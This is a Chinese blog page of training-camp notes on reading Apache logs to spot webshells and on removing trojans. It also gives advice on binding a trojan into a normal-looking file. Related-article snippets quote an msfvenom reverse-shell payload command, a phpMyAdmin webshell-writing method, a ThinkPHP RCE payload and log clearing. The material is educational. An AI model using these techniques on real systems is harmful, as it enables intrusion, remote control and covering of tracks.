蓝盾实训营day6——日志查看和木马清除

最新推荐文章于 2022-11-01 21:54:08 发布
最新推荐文章于 2022-11-01 21:54:08 发布
阅读量985 收藏 2
点赞数
分类专栏: 网络安全 蓝盾十天网络攻防实训营记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mingC0758/article/details/81060490
版权
本文介绍了如何开启服务器日志,特别是apache-php的日志,并通过日志分析潜在的挂马行为。接着,文章讲解了木马的捆绑过程,使用万能文件免杀捆绑器将木马伪装成正常文件。在木马清除部分,详细阐述了如何使用IceSword、Process Hacker和Autoruns等工具定位并消除可疑进程,解决镜像劫持和开机自启问题,最终清除木马文件。
摘要由CSDN通过智能技术生成

开启服务器日志

根据应用服务器的不同,有不同的日志开启方法,具体方法直接百度就行,比较简单。开启日志之后,用web扫描工具对网站进行扫描,利用文件上传漏洞进行挂马,然后我们可以查看日志,如果发现有未知页面被客户端访问,则可能发生了挂马行为,查找服务器有没有该木马文件,有就删掉。

apache-php开启日志方法

打开文件:
Apache/conf/httpd
找到:
#CustomLog "logs/access.log" combined
把井号注释去掉,保存,重启apache服务,日志就开启了。

用web扫描工具扫描一下,然后打开access.log文件查看日志:
这里写图片描述

可以看到网站有被扫描过的痕迹。

木马捆绑

工具:万能文件免杀捆绑器
用处:将木马文件伪装成正常文件诱导用户点击运行

这个工具没有免杀功能,免杀的话自己加壳效果才好。

最低0.47元/天 解锁文章
mingC0758
关注
专栏目录
蓝盾实训营day7——meterpreter木马生成和利用
mingC0758的博客
07-17 1136
meterpreter木马生成和利用 木马生成 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe lhost 本地ip lport 本地端口 命令完成后,会在当前目录下生成一个...
ThinkPHP通过日志查找后门木马的方法
美奇软件开发工作室
04-21 893
导读: 黑客会在很多开源框架里植入自己的木马或后门,典型的就是eval一句话,如果你使用的是开源程序,或者从别人那里购买回来的程序,一定要认真检查,及时清理掉后门木马,以免网站和服务器被黑客控制,从而造成不必要的损失。作为运维,可以通过查看网站日志查看是否有人尝试入侵,通过日志可以很清晰的了解到黑客的手段,下面分享我是怎么通过日志查看的,如果发现有人尝试入侵,我会直接屏蔽他的IP,因为我的网站是自己开发的,并没有使用任何开源插件,所以才没有被黑客成功入侵。 一、使用文本替换专家2.5.exe工具,在网
如何查看系统中的木马
qq_40931877的博客
01-22 1232
查询系统中的木马通过启动文件检查通过进程检测通过网络连接检测 如果系统中出现了以下五种情况,最好检查以下是否中了木马: 1.突然进入陌生网站 2.出现从没有见过的警告框 3.系统自动变更设置 4.硬盘长时间读取,网络连接和鼠标、屏幕出现异常,驱动灯光长亮 5.系统运行慢,甚至死机 通过启动文件检查 一旦电脑中了木马,一般启动电脑时就会加载,这时你熟悉自己电脑的文件,就可以看到木马的加载并清除(一般...
开发自己的远程日志清除, 入侵全身而退
www.i201314.net
08-05 914
需要完成的功能   通过命令行实现windows日志清除 具体哪些日志类型,不清楚的朋友请参考 文章  《来无影 去无踪--windows日志清除日志解读、入侵取证》 先贴图看下效果  命令操作 E:\>clog ======================clear log(clog)====================== author:a
检测自己电脑是否中病毒木马方法
[智能天空教程区 Smart-sky]
06-19 1916
你应该有过这样的遭遇,就是电脑感染上了间谍软件或广告软件。在这种情况下,解决问题的关键就是要在你的硬盘、内存或Windows注册表中找出间谍软件的所在。我最近研究了我的主要网络内的几台机器,以找到间谍软件和广告软件的感染信息。我个人建议,最好能利用一些有效的商业软件和免费软件经常进行这样的检查。 下面介绍一下步骤: 1.在使用某种商业软件或免费软件的工具检查之前,尽可能的将机器清理干净。运
蓝盾实训营day9——Windows主机安全加固和Android木马生成
mingC0758的博客
07-19 478
Windows主机安全加固 禁用guest账户 设置账户锁定策略 设置Administrator不允许终端登陆 使用注册表更改远程桌面监听的端口 用netstat -an 查看端口打开情况,关闭不必要的端口 关闭自动播放,防止U盘插入后病毒自动运行 7. ...
蓝盾实训营day1——配置渗透环境和SQL注入
mingC0758的博客
07-09 824
蓝盾实训营day1——配置渗透环境和SQL注入 有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。 黑客是如何入侵的 踩点 whois 扫描 nmap 提权 破坏 后门 搜索网络设备 shodan.io 远程摄像头…… 搜索jaws/1.0 country:”CN” windows服务器 不开源 收费 nma...
蓝盾实训营day5——windows主机渗透、kali-metasploit、melody木马
mingC0758的博客
07-13 890
目录: 目标扫描 漏洞扫描 漏洞利用 提权 留后门 环境: windows xp sp2 (ms08_067漏洞利用) kali linux 2.0(配置好Nessus环境)
蓝盾实训营day10——Web渗透实战
mingC0758的博客
07-20 906
扫描 SQL注入 开放了80端口,直接用浏览器访问靶机的网站,发现有SQL注入点: payload http://192.168.188.150/index.php?s=/news/6) and 1=2 union select 1,database(),3,4,5,6,version()-- 最终得到数据库账号密码: 这里用的是base64加密,可以直接解密成明...
进程日志监控工具
10-08
使用者就可以对系统中的任何文件和注册表操作同时进行监视和记录,通过注册表和文件读写的变化,对于帮助诊断系统故障或是发现恶意软件、病毒或木马来说,非常有用。
作为蓝队如何进行排查系统的安全问题(仅作为学习笔记)
qq_42640780的博客
06-26 571
应急响应系统排查
查找文件被删除的记录日志
热门推荐
qq_39264896的博客
09-21 2万+
如何查找指定文件被删除的记录?
应急响应:WEB 分析日志攻击,后门木马(手动分析 和 自动化分析.)
网络安全领域___专研者.
05-31 6246
应急响应的概括: 应急响应”对应的英文是“Incident Response”或“Emergency Response”等,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措. 网络安全应急响应:针对已经发生的或可能发生的安全事件进行监控、分析、协调、处理、保护资产安全.
利用phpmyadmin日志写入一句话木马
m0_68019293的博客
03-15 2743
首先登陆phpMyadmin后,点击sql模块 先用这一句命令查看它是否存在 secure_file_priv 这项功能,要null不一定等于no哦,如果没有就可以利用来写一个webshell 现在写入一句话木马文件,用into outfile函数 加网站下绝对路径,记住哦要把\ 改为/,因为网站的/ 和根目录下的\是不一样的 现在已经成功的写入了一句话木马的文件,这时候就可以用菜刀,蚁剑等工具链接它的文件绝对路径得到它的webshell,这是第一种方式 2 接下来这种呢就是利用日志..
应急响应:Windows 和 Linux 操作系统(日志分析,后门查杀,勒索病毒处理.)
网络安全领域___专研者.
06-03 7254
应急响应的概括: 应急响应”对应的英文是“Incident Response”或“Emergency Response”等,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措. 网络安全应急响应:针对已经发生的或可能发生的安全事件进行监控、分析、协调、处理、保护资产安全................
网站被攻击如何查找木马文件 以及攻击者IP
最新发布
网站安全专家
11-01 1096
很对客户网站以及服务器被攻击,被黑后,留下了很多webshell文件,也叫网站木马文件,客户对自己网站的安全也是很担忧,担心网站后期会继续被攻击篡改,毕竟没有专业的安全技术去负责网站的安全防护工作,通过老客户的介绍很多客户在遇到网站被攻击后找到我们做网站的安全服务,防止恶意攻击与篡改。对网站进行全面的防御与加固,我们在对客户网站进行安全部署的同时,客户经常会想要了解到底网站,以及服务器是如何被入侵...
windows 服务器系统日志分析及安全
a18770840362的博客
05-30 3276
一、利用Windows自带的防火墙日志检测入侵 下面是一条防火墙日志记录 2005-01-1300:35:04OPENTCP61.145.129.13364.233.189.104495980 2005-01-1300:35:04:表示记录的日期时间 OPEN:表示打开连接;如果此处为Close表示关闭连接 TCP:表示使用的协议是Tcp 61.145.129.133:表示本地的IP 6...
渗透测试实战-文件包含和日志文件写入木马混合利用
网络安全领域优质创作者
02-27 2228
1.起因 我有一个朋友,让我帮忙测试一下他的站,于是有了这篇文章。(无中生友篇) 2.信息收集 访问首页一下先,看到是thinkphp v5.0版本。 然后谷歌大法,直接上TP 5.X RCE的EXP,一顿骚操作: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=sy...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值